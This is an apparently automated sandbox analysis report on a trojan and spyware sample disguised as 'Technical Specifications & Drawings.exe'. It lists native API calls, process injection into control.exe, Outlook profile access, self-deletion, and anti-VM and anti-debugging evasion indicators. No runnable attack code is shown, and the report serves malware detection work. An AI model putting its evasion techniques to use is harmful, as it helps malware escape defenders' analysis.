Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DEBB0 4_2_017DEBB0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_018722AE 4_2_018722AE
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864AEF 4_2_01864AEF
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0185FA2B 4_2_0185FA2B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01862D82 4_2_01862D82
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017A0D20 4_2_017A0D20
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_018725DD 4_2_018725DD
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01872D07 4_2_01872D07
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017BD5E0 4_2_017BD5E0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01871D55 4_2_01871D55
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D2581 4_2_017D2581
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864496 4_2_01864496
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B841F 4_2_017B841F
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0186D466 4_2_0186D466
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0187DFCE 4_2_0187DFCE
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01871FF1 4_2_01871FF1
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017C6E30 4_2_017C6E30
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01872EF7 4_2_01872EF7
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0186D616 4_2_0186D616
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: String function: 017AB150 appears 133 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 4_2_017E9910
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E99A0 NtCreateSection,LdrInitializeThunk, 4_2_017E99A0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9860 NtQuerySystemInformation,LdrInitializeThunk, 4_2_017E9860
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9840 NtDelayExecution,LdrInitializeThunk, 4_2_017E9840
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E98F0 NtReadVirtualMemory,LdrInitializeThunk, 4_2_017E98F0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9A50 NtCreateFile,LdrInitializeThunk, 4_2_017E9A50
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9A20 NtResumeThread,LdrInitializeThunk, 4_2_017E9A20
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9A00 NtProtectVirtualMemory,LdrInitializeThunk, 4_2_017E9A00
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9540 NtReadFile,LdrInitializeThunk, 4_2_017E9540
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E95D0 NtClose,LdrInitializeThunk, 4_2_017E95D0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9710 NtQueryInformationToken,LdrInitializeThunk, 4_2_017E9710
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9FE0 NtCreateMutant,LdrInitializeThunk, 4_2_017E9FE0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E97A0 NtUnmapViewOfSection,LdrInitializeThunk, 4_2_017E97A0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9780 NtMapViewOfSection,LdrInitializeThunk, 4_2_017E9780
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9660 NtAllocateVirtualMemory,LdrInitializeThunk, 4_2_017E9660
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E96E0 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_017E96E0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9950 NtQueueApcThread, 4_2_017E9950
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E99D0 NtCreateProcessEx, 4_2_017E99D0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017EB040 NtSuspendThread, 4_2_017EB040
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9820 NtEnumerateKey, 4_2_017E9820
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E98A0 NtWriteVirtualMemory, 4_2_017E98A0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9B00 NtSetValueKey, 4_2_017E9B00
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017EA3B0 NtGetContextThread, 4_2_017EA3B0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9A10 NtQuerySection, 4_2_017E9A10
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9A80 NtOpenDirectoryObject, 4_2_017E9A80
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9560 NtWriteFile, 4_2_017E9560
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017EAD30 NtSetContextThread, 4_2_017EAD30
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9520 NtWaitForSingleObject, 4_2_017E9520
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E95F0 NtQueryInformationFile, 4_2_017E95F0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017EA770 NtOpenThread, 4_2_017EA770
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9770 NtSetInformationFile, 4_2_017E9770
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9760 NtOpenProcess, 4_2_017E9760
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9730 NtQueryVirtualMemory, 4_2_017E9730
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017EA710 NtOpenProcessToken, 4_2_017EA710
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9670 NtQueryInformationProcess, 4_2_017E9670
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9650 NtQueryValueKey, 4_2_017E9650
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9610 NtEnumerateValueKey, 4_2_017E9610
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E96D0 NtCreateKey, 4_2_017E96D0
Sample file is different than original file name gathered from version info
Source: Technical Specifications & Drawings.exe, 00000000.00000002.263993924.00000000029B4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWebName.dll4 vs Technical Specifications & Drawings.exe
Source: Technical Specifications & Drawings.exe, 00000000.00000000.238895450.00000000004C6000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameFileSh.exeB vs Technical Specifications & Drawings.exe
Source: Technical Specifications & Drawings.exe, 00000000.00000002.276069305.00000000070C0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameDoncepre.dll@ vs Technical Specifications & Drawings.exe
Source: Technical Specifications & Drawings.exe, 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDoncepre.dll@ vs Technical Specifications & Drawings.exe
Source: Technical Specifications & Drawings.exe, 00000000.00000002.275768947.0000000006F70000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameWebName.dll4 vs Technical Specifications & Drawings.exe
Source: Technical Specifications & Drawings.exe, 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Technical Specifications & Drawings.exe
Source: Technical Specifications & Drawings.exe, 00000004.00000003.261218393.0000000001562000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Technical Specifications & Drawings.exe
Source: Technical Specifications & Drawings.exe, 00000004.00000003.263343456.0000000001702000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Technical Specifications & Drawings.exe
Source: Technical Specifications & Drawings.exe Binary or memory string: OriginalFilenameFileSh.exeB vs Technical Specifications & Drawings.exe
Source: Technical Specifications & Drawings.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Technical Specifications & Drawings.exe Virustotal: Detection: 32%
Source: Technical Specifications & Drawings.exe ReversingLabs: Detection: 21%
Source: Technical Specifications & Drawings.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Technical Specifications & Drawings.exe "C:\Users\user\Desktop\Technical Specifications & Drawings.exe"
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process created: C:\Users\user\Desktop\Technical Specifications & Drawings.exe C:\Users\user\Desktop\Technical Specifications & Drawings.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process created: C:\Users\user\Desktop\Technical Specifications & Drawings.exe C:\Users\user\Desktop\Technical Specifications & Drawings.exe Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Technical Specifications & Drawings.exe.log Jump to behavior
Source: C:\Windows\SysWOW64\control.exe File created: C:\Users\user\AppData\Local\Temp\207G7-97P Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@4/2@14/6
Source: Technical Specifications & Drawings.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: Technical Specifications & Drawings.exe, ProcExpGUI/Form1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.0.Technical Specifications & Drawings.exe.400000.0.unpack, ProcExpGUI/Form1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Technical Specifications & Drawings.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Technical Specifications & Drawings.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: Technical Specifications & Drawings.exe, 00000004.00000003.260883902.000000000144C000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000003.262790961.00000000015E3000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.349077296.000000000423C000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.346500614.000000000409E000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.515758890.00000000044EF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.513604126.00000000043D0000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Technical Specifications & Drawings.exe, Technical Specifications & Drawings.exe, 00000004.00000003.260883902.000000000144C000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000003.262790961.00000000015E3000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.349077296.000000000423C000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.346500614.000000000409E000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.515758890.00000000044EF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.513604126.00000000043D0000.00000040.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: Technical Specifications & Drawings.exe, ProcExpGUI/Form1.cs .Net Code: WaitHandle System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.Technical Specifications & Drawings.exe.400000.0.unpack, ProcExpGUI/Form1.cs .Net Code: WaitHandle System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 0_2_028EEFEA pushad ; retf 0_2_028EEFF1
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 0_2_028EF78A pushad ; iretd 0_2_028EF791
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017FD0D1 push ecx; ret 4_2_017FD0E4
Source: initial sample Static PE information: section name: .text entropy: 7.780783068719605

Hooking and other Techniques for Hiding and Protection
barindex
Deletes itself after installation
Source: C:\Windows\SysWOW64\control.exe File deleted: c:\users\user\desktop\technical specifications & drawings.exe Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: 00000000.00000002.264997908.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Technical Specifications & Drawings.exe PID: 6080, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Technical Specifications & Drawings.exe, 00000000.00000002.264997908.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: Technical Specifications & Drawings.exe, 00000000.00000002.264997908.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe TID: 6116 Thread sleep time: -45877s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe TID: 3116 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 1972 Thread sleep time: -30000s >= -30000s Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01875BA5 rdtsc 4_2_01875BA5
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe API coverage: 4.0 %
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Thread delayed: delay time: 45877 Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000005.00000000.306843353.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000005.00000000.286686271.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
Source: explorer.exe, 00000005.00000000.309044837.0000000008476000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: lume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
Source: Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000005.00000000.320624186.0000000000680000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&280b647&
Source: explorer.exe, 00000005.00000000.320680950.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000005.00000000.286686271.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000005.00000000.286686271.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t]
Source: explorer.exe, 00000005.00000000.327010240.00000000062C4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.286686271.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+]e
Source: explorer.exe, 00000005.00000000.323194447.0000000004287000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
Source: explorer.exe, 00000005.00000000.330711449.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000005.00000000.306843353.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000005.00000000.286686271.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00l
Source: Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01875BA5 rdtsc 4_2_01875BA5
Enables debug privileges
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017AB171 mov eax, dword ptr fs:[00000030h] 4_2_017AB171
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017AB171 mov eax, dword ptr fs:[00000030h] 4_2_017AB171
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017AC962 mov eax, dword ptr fs:[00000030h] 4_2_017AC962
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_018649A4 mov eax, dword ptr fs:[00000030h] 4_2_018649A4
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_018649A4 mov eax, dword ptr fs:[00000030h] 4_2_018649A4
